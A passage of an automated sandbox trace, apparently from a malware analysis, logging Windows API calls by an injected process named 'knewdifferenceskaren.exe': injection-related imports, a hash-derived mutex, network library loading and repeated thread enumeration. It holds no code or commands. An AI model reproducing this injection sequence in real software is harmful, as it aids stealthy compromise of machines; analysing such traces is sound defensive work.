lpte=0x233f9fc) returned 1 [0167.583] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.583] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.583] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.583] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.584] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.584] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.584] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.585] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.585] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.585] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.586] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.586] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.586] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.586] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.587] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.587] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.587] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.588] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.588] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.588] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.588] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.589] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.589] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.747] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.748] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.748] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.748] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.748] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.749] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.749] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.749] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.750] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.750] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.750] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.751] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.751] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.751] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.752] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.752] Thread32Next (hSnapshot=0x88, lpte=0x233f9fc) returned 1 [0167.767] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6bc) returned 0x8c [0167.767] ResumeThread (hThread=0x8c) returned 0x1 [0167.767] CloseHandle (hObject=0x8c) returned 1 [0167.767] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x8c [0167.767] ResumeThread (hThread=0x8c) returned 0x1 [0167.767] CloseHandle (hObject=0x8c) returned 1 [0167.961] CloseHandle (hObject=0x88) returned 1 [0167.961] VirtualQuery (in: lpAddress=0x580a80, lpBuffer=0x233f9f0, dwLength=0x1c | out: lpBuffer=0x233f9f0*(BaseAddress=0x580000, AllocationBase=0x560000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.961] GetProcessHeap () returned 0x560000 [0167.961] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x580a80 | out: hHeap=0x560000) returned 1 [0167.961] VirtualQuery (in: lpAddress=0x580970, lpBuffer=0x233f9f0, dwLength=0x1c | out: lpBuffer=0x233f9f0*(BaseAddress=0x580000, AllocationBase=0x560000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.961] GetProcessHeap () returned 0x560000 [0167.961] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x580970 | out: hHeap=0x560000) returned 1 [0167.961] RtlExitUserThread (Status=0x0) Process: id = "24" image_name = "knewdifferenceskaren.exe" filename = "c:\\program files\\windows mail\\knewdifferenceskaren.exe" page_root = "0x661aa000" os_pid = "0x240" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Windows Mail\\knewdifferenceskaren.exe\" " cur_dir = "C:\\Program Files\\Windows Mail\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 232 os_tid = 0x9c8 Thread: id = 233 os_tid = 0x244 Thread: id = 234 os_tid = 0xa10 [0166.971] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0166.971] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0166.972] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0166.973] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0166.974] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0166.974] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0166.974] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0166.974] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0166.974] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0166.974] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0166.974] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0166.974] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0166.974] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0166.974] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0166.974] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0166.974] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0166.981] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0166.981] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0166.981] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0166.986] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0166.986] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0166.986] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0166.986] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0166.986] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0166.986] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0166.986] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0166.987] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0166.987] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0166.987] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0166.987] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0166.987] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0166.990] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0166.990] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0166.991] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0166.991] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0166.992] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0166.992] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0166.992] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0166.992] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x22cf7d8 | out: lpflOldProtect=0x22cf7d8*=0x40) returned 1 [0166.992] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x22cf7d8 | out: lpflOldProtect=0x22cf7d8*=0x4) returned 1 [0166.993] VirtualQuery (in: lpAddress=0x170016, lpBuffer=0x22cf7d0, dwLength=0x1c | out: lpBuffer=0x22cf7d0*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0166.993] GetProcessHeap () returned 0x760000 [0166.993] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x364) returned 0x780508 [0166.993] RtlMoveMemory (in: Destination=0x780508, Source=0x170016, Length=0x363 | out: Destination=0x780508) [0166.993] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x170016) returned 0x0 [0166.993] GetCurrentProcessId () returned 0x240 [0166.993] GetProcessHeap () returned 0x760000 [0166.993] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x105) returned 0x780878 [0166.993] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x780878, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Mail\\knewdifferenceskaren.exe" (normalized: "c:\\program files\\windows mail\\knewdifferenceskaren.exe")) returned 0x36 [0166.993] GetProcessHeap () returned 0x760000 [0166.993] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x105) returned 0x780988 [0166.993] GetCurrentProcessId () returned 0x240 [0166.994] wsprintfA (in: param_1=0x780988, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Windows Mail\\knewdifferenceskaren.exe3708421245763") returned 67 [0166.994] CryptAcquireContextA (in: phProv=0x22cf7d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x22cf7d4*=0x780ad8) returned 1 [0167.161] CryptCreateHash (in: hProv=0x780ad8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x22cf7d8 | out: phHash=0x22cf7d8) returned 1 [0167.161] lstrlenA (lpString="C:\\Program Files\\Windows Mail\\knewdifferenceskaren.exe3708421245763") returned 67 [0167.161] CryptHashData (hHash=0x7813e8, pbData=0x780988, dwDataLen=0x43, dwFlags=0x0) returned 1 [0167.161] CryptGetHashParam (in: hHash=0x7813e8, dwParam=0x2, pbData=0x22cf7c4, pdwDataLen=0x22cf7dc, dwFlags=0x0 | out: pbData=0x22cf7c4, pdwDataLen=0x22cf7dc) returned 1 [0167.161] wsprintfA (in: param_1=0x780988, param_2="%02X" | out: param_1="97") returned 2 [0167.161] wsprintfA (in: param_1=0x78098a, param_2="%02X" | out: param_1="8A") returned 2 [0167.161] wsprintfA (in: param_1=0x78098c, param_2="%02X" | out: param_1="37") returned 2 [0167.161] wsprintfA (in: param_1=0x78098e, param_2="%02X" | out: param_1="2B") returned 2 [0167.161] wsprintfA (in: param_1=0x780990, param_2="%02X" | out: param_1="8B") returned 2 [0167.162] wsprintfA (in: param_1=0x780992, param_2="%02X" | out: param_1="18") returned 2 [0167.162] wsprintfA (in: param_1=0x780994, param_2="%02X" | out: param_1="9D") returned 2 [0167.162] wsprintfA (in: param_1=0x780996, param_2="%02X" | out: param_1="14") returned 2 [0167.162] wsprintfA (in: param_1=0x780998, param_2="%02X" | out: param_1="6E") returned 2 [0167.162] wsprintfA (in: param_1=0x78099a, param_2="%02X" | out: param_1="57") returned 2 [0167.162] wsprintfA (in: param_1=0x78099c, param_2="%02X" | out: param_1="1F") returned 2 [0167.162] wsprintfA (in: param_1=0x78099e, param_2="%02X" | out: param_1="EA") returned 2 [0167.162] wsprintfA (in: param_1=0x7809a0, param_2="%02X" | out: param_1="F3") returned 2 [0167.162] wsprintfA (in: param_1=0x7809a2, param_2="%02X" | out: param_1="2A") returned 2 [0167.162] wsprintfA (in: param_1=0x7809a4, param_2="%02X" | out: param_1="C0") returned 2 [0167.162] wsprintfA (in: param_1=0x7809a6, param_2="%02X" | out: param_1="1B") returned 2 [0167.162] CryptDestroyHash (hHash=0x7813e8) returned 1 [0167.162] CryptReleaseContext (hProv=0x780ad8, dwFlags=0x0) returned 1 [0167.162] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="978A372B8B189D146E571FEAF32AC01B") returned 0x80 [0167.162] GetLastError () returned 0x0 [0167.162] Sleep (dwMilliseconds=0x1f4) [0167.871] GetCurrentProcessId () returned 0x240 [0167.871] GetCurrentThreadId () returned 0xa10 [0167.871] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0167.873] Thread32First (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.873] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.873] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.874] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.874] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.874] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.874] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.875] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.875] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.875] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.876] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.876] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.876] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.876] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.877] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.877] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.877] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.878] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.878] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.878] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.878] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.879] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.879] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.879] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.879] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.880] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.880] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.880] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.881] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.881] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.881] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.881] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.882] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.882] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.882] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.882] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.883] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.883] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.883] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.884] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.884] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.884] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.884] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.885] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.885] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.885] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.886] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.886] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.886] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.886] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.887] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.887] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.887] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.887] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.888] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.888] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.888] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.889] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.889] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.889] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.890] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.890] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.890] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.890] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.891] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.891] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.891] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.891] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.892] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.892] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.892] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.893] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.893] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.893] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.893] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.894] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.894] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.894] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.894] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.895] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.895] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.895] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.896] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.896] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.896] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.897] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.897] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.897] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.897] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.898] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.898] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.898] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.899] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.899] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.899] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.899] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.900] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.900] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.900] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.900] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.901] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.901] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.901] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.902] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.902] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.902] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.902] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.903] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.903] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.903] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.903] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.904] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.904] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.904] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.905] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.905] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.905] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.905] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.906] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.906] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.906] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.906] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.907] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.907] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.907] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.908] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.908] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.908] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.908] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.909] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.909] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.909] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.909] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.910] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.910] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.910] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.911] Thread32Next (hSnapshot=0x88, lpte=0x22cf7c8) returned 1 [0167.911] Thread32Next (hSnapshot=0x88, 